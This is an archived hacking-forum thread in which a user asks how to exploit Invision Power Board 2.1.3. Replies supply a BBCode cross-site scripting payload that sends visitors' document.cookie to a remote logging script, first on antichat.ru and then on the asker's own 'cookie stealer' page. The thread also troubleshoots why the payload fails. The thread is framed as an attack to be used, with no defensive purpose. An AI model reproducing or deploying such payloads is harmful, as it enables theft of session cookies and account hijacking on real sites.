ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Forum for discussion of ANTICHAT
Перезагрузить страницу ipb question
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

ipb question
  #1  
Старый 27.12.2005, 06:27
Аватар для caffine2
caffine2
Новичок
Регистрация: 11.08.2005
Сообщений: 6
Провел на форуме:
12994

Репутация: 0
По умолчанию ipb question
iS their a way to exploit Invision Power Board v2.1.3 and hack it?
 
Ответить с цитированием

  #2  
Старый 27.12.2005, 12:00
Аватар для Barsik
Barsik
Постоянный
Регистрация: 16.01.2005
Сообщений: 300
Провел на форуме:
3463790

Репутация: 726
Отправить сообщение для Barsik с помощью ICQ Отправить сообщение для Barsik с помощью MSN
По умолчанию
No sploit
but it have XSS
Код HTML:
[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
 
Ответить с цитированием

  #3  
Старый 27.12.2005, 17:29
Аватар для caffine2
caffine2
Новичок
Регистрация: 11.08.2005
Сообщений: 6
Провел на форуме:
12994

Репутация: 0
По умолчанию
Hmm they must have patched it becuase everything before .com get's filterd out, and you see the xss?

.com">wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
 
Ответить с цитированием

  #4  
Старый 27.12.2005, 17:37
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию
this bug only for IE
 
Ответить с цитированием

  #5  
Старый 27.12.2005, 21:28
Аватар для caffine2
caffine2
Новичок
Регистрация: 11.08.2005
Сообщений: 6
Провел на форуме:
12994

Репутация: 0
По умолчанию
oooo, i get it except i have 1 more question,
Код HTML:
[email]black@bandit[url=http://www.google.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://mysite/webmaster/cookie32.php?"+document.cookie);`
and for some reason it's not directing it to my cookie stealer i'm guessing it's due to the document.images, so in order for this to work do i need to make a dynamic signature?
Последний раз редактировалось caffine2; 27.12.2005 в 22:07..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
La question selon cmd Vandal Болталка 12 06.08.2005 19:20
First Time Poster. Have a Question bruno168 Болталка 1 16.05.2005 20:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ